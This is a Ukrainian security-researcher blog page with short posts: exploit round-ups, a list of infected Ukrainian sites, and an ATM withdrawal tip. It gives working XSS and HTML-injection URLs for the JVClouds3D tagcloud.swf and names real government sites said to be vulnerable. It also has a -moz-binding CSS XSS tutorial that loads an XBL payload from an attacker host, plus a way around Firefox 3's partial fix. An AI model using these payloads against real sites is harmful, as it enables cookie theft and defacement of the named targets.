Websecurity - Веб безпека

В грудні я писав про свої послуги по обміну WebMoney <-> LiqPAY, виводу WebMoney <-> Visa <-> та виводу WebMoney <-> Приват24. Зазначу, що в цьому місяці я підняв комісії на обмінні операції.

Детально про даний проект та про поточні комісії ви можете прочитати в мене на форумі та на форумі hackua.com.

І в своєму записі я писав про можливість виведення грошей з LiqPAY в банкоматі. Для чого потрібно з собою мати мобільний телефон та кредитну карту. Як я зазнав раніше, кредитка потрібна лише для обходу обмежень банкомату, щоб дістатися до його меню.

Декілька днів тому я вивів гроші з LiqPAY в банкоматі ПриватБанку (щоб власноруч перевірити даний функціонал). Під час чого стикнувся з деякими нюансами, про які вам і розповім.

При виведенні грошей в банкоматі вам потрібно мати на рахунку LiqPAY гривні. Якщо у вас в LiqPAY є тільки гроші на доларовому чи іншому рахунку, окрім гривневого, ви не зможете вивести гроші. Банкомат видасть повідомлення про помилку, що операцію виконати не вдалось. При виведенні в банкоматі немає автоматичної конвертації з інших валют в гривню. А це було б варто ПриватБанку зробити, так було б набагато зручніше користувачам системи LiqPAY.

Тому спочатку вам потрібно обміняти гроші з іншого рахунку (наприклад, доларового) на гривні (UAH) в LiqPAY. Причому потрібно мати гривень з запасом, щоб вистачило на комісію системи (за виведення в банкоматі комісія 1% + $1,95). І лише після того, як у вас буде достатня для виведення сума, ви можете зняти гроші в банкоматі. При цьому потрібно врахувати наявні в банкоматі купюри (тобто треба виводити суму, що кратна тим купюрам, що зараз наявні в банкоматі). А це варто визначити заздалегідь.

В даній добірці експлоіти в веб додатках:

• BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability (деталі)
• LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability (деталі)
• PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability (деталі)
• AN Guestbook 0.7.8 (g_lang) Local File Inclusion Vulnerability (деталі)
• Tribiq CMS 5.0.12c (XSS/LFI) Multiple Remote Vulnerabilities (деталі)
• Joomla Component com_pinboard Remote File Upload Vulnerability (деталі)
• Glossword <= 1.8.11 (index.php x) Local File Inclusion Vulnerability (деталі)
• Joomla Component com_amocourse (catid) SQL Injection Vuln (деталі)
• Joomla Component com_pinboard (task) SQL Injection Exploit (деталі)
• User options changer (SQLi) EXPLOIT Bigace CMS stable release 2.5 (деталі)

Раніше я вже писав про XSS уразливість в Joomulus для Joomla. Така ж уразливість є і в плагіні JVClouds3D (mod_jvclouds3D), що використовує tagcloud.swf розроблений автором WP-Cumulus.

Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 8 мільйонах флеш файлах. Я наводив приклад даної уразливості в JVClouds3D серед XSS уразливостей в tagcloud.swf на gov та gov.ua, зокрема на сайті http://spacecenter.gov.ua.

Сьогодні я знайшов Cross-Site Scripting уразливість в плагіні JVClouds3D для Joomla. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/modules/mod_jvclouds3D/jvclouds3D/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/modules/mod_jvclouds3D/jvclouds3D/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі JVClouds3D 1.0.9b та попередні версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://teva.ua - інфекція була виявлена 07.01.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://posada.com.ua - інфекція була виявлена 26.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 44 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://polynovepole.com.ua - інфекція була виявлена 07.01.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://aiuto.at.ua - інфекція була виявлена 06.01.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://odegda.cv.ua - інфекція була виявлена 08.01.2010. Зараз сайт входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• SQL INJECTION VULNERABILITY LightOpen CMS Devel 0.1 (деталі)
• Joomla! 1.5.10 JA_Purity Multiple Persistent XSS (деталі)
• LightOpenCMS 0.1 pre-alpha Remote SQL Injection (деталі)
• Oracle Database SQL Injection in SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE (деталі)
• Oracle Database multiple SQL Injection vulnerabilities in Workspace Manager (деталі)
• Oracle Database SQL Injection in SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE (деталі)
• Oracle Database Multiple SQL Injection vulnerabilities in LTADM (деталі)
• SQL INJECTION VULNERABILITY Kjtechforce mailman Beta-1 (деталі)
• Zoki Catalog SQL Injection (деталі)
• MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES S-CMS <= v-2.0 Beta3 (деталі)

Після виходу в грудні, 15.12.2009, Firefox 3.0.16, в якому було виправлено 5 уразливостей, в січні, 05.01.2010, вийшов Firefox 3.0.17. В якому не було зроблено жодних секюріті покращень і виправлень (хоча дірок в ньому вистачає, про що я неодноразово повідомляв Mozilla, але вони завжди ігнорували мої повідомлення про DoS і XSS уразливості в їхніх браузерах).

В останній версії Firefox був виправлений лише баг з презентацією оновлень користувачам.

Також в цей же день вийшов Firefox 3.5.7. В якому також не було зроблено жодних секюріті покращень і виправлень. Лише виправленна загальна проблема зі стабільністю (що може включати і DoS уразливість, але Mozilla любить відности це не до уразливостей, а до stability issue) та виправленний баг з презентацією оновлень користувачам.

В своїй статті XSS уразливості в 8 мільйонах флеш файлах я писав, що по даним Гугла в Інтернеті є до 34 мільйонів флешек (tagcloud.swf) потенційно вразливих до XSS атак. Файл tagcloud.swf розроблений автором плагіна WP-Cumulus для WordPress і постачається з даним плагіном для WP, а також з іншими плагінами, зокрема Joomulus для Joomla.

Так як на багатьох державних сайтах використовуються різні движки до яких розроблені плагіни з даним swf-файлом (і відповідно дані сайти можуть бути вразливі до XSS), я приведу вам перелік вразливих державних сайтів різних країн. Наступні державні сайти мають Cross-Site Scripting уразливості у флешці tagcloud.swf.

XSS на gov сайтах (окрім державних сайтів України):

http://gibdd.tambov.gov.ru

• alert(document.cookie)
• цікавий

http://dpw.ecprov.gov.za

• alert(document.cookie)
• цікавий

http://media1.aso.gov.au

• alert(document.cookie)
• цікавий

http://education.gov.lc

• alert(document.cookie)
• цікавий

http://www.muskegon-mi.gov

• цікавий

На даному сайті використовується пропатчена версія WP-Cumulus, в якій виправлена XSS, але в якій все ще наявна HTML Injection.

XSS на gov.ua сайтах:

http://www.galych-rada.gov.ua

• alert(document.cookie)
• цікавий

http://www.smida.gov.ua

• alert(document.cookie)
• цікавий

http://cult.gov.ua

• alert(document.cookie)
• цікавий

http://spacecenter.gov.ua

• alert(document.cookie)
• цікавий

http://uit.umvs-kherson.gov.ua

• alert(document.cookie)
• цікавий

http://letadm.gov.ua

• alert(document.cookie)
• цікавий

http://old.smida.gov.ua

• alert(document.cookie)
• цікавий

При наявності XSS уразливості на сайті, у випадку коли немає можливості використовувати кутові дужки (або при забороні необхідних html-тегів), можна провести атаку через стилі - через властивість style в html-об’єтах. ЇЇ можна використати в різних html-тегах: <a>, <p> та інших.

Дані атаки можуть проводитися як через reflected XSS, так і через persistent XSS уразливості. Зокрема в браузерах Mozilla і Firefox (та інших браузерах на движку Gecko), XSS атаки через стилі можуть проводитися за допомогою властивості -moz-binding.

Для XSS атаки на сайті http://site потрібно вказати в -moz-binding лінку на xml-файл з JS-кодом, який може знаходитися на будь-якому сайті (наприклад, http://attacker_site).

<p style="-moz-binding:url('http://attacker_site/xss.xml#xss')">XSS</p>

Приклад xml-файла для демонстрації XSS атаки:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert(document.cookie);
</constructor>
</implementation>
</binding>
</bindings>

Приклад подібної атаки з використанням -moz-binding я наводив на fileshare.in.ua.

Дані атаки працювали в браузерах Mozilla та Firefox до Firefox 3. Післі виходу 17.06.2008 Firefox 3 дані атаки перестали в ньому працювати, бо в Firefox 3 даний вектор XSS атаки був виправлений. Але виправлений лише частково і дане виправлення можна обійти і провести XSS атаку.

Для XSS атаки в Firefox 3 на сайті http://site потрібно розмістити xml-файл на даному сайті і вказати в -moz-binding лінку на xml-файл з JS-кодом. Шлях до xml-файла може бути абсолютним, або відносним.

<p style="-moz-binding:url('http://site/xss.xml#xss')">XSS</p>

Так що в версіях Firefox 3 і вище даний вектор XSS атаки все ще працює (при використанні xml-файла на тому самому сайті, де і XSS уразливість). І при наявності на сайті аплоадера для завантаження xml-файла, дану XSS атаку легко можно провести.

Для тих, кому потрібна автоматизована XSS атака (через inline-стилі), без використання -moz-binding, то для цього можна використати іншу техніку атаки (про яку я вже писав). Що буде працювати як на сайтах з аплоадерами, так і на всіх інших сайтах, як в Firefox 2 і попередніх версіях, так і в Firefox 3 і вище, а також в усіх інших браузерах.

Поздоровляю вас з Різдвом Христовим!

У зв’язку зі святами - Новим Роком та Різдвом - пропоную подивитися мою святкову листівку на флеші.

Бажаю вам всього найкращого .

В даній добірці експлоіти в веб додатках:

• RS-CMS 2.1 (key) Remote SQL Injection Vulnerability (деталі)
• Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln (деталі)
• Sourcebans <= 1.4.2 Arbitrary Change Admin Email Vulnerability (деталі)
• Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities (деталі)
• Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability (деталі)
• Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities (деталі)
• Zen Cart 1.3.8 Remote SQL Execution Exploit (деталі)
• Zen Cart 1.3.8 Remote Code Execution Exploit (деталі)
• phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities (деталі)
• Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit (деталі)